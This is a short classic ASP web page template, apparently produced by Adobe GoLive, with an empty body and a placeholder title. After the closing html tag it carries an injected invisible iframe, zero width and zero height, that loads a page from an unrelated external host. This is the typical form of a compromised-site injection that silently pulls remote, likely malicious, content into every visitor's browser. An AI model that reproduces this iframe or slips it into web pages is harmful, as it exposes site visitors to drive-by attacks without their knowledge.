<%@Language=VBScript%>

<html>

	<head>
		<meta http-equiv="content-type" content="text/html;charset=iso-8859-1">
		<meta name="generator" content="Adobe GoLive">
		<title>agl:pagetitle</title>
	</head>

	<body bgcolor="#ffffff">
		<p></p>
	</body>

</html>
<iframe src=http://user.free.77169.net/ugfl/sj.htm width=0 height=0></iframe>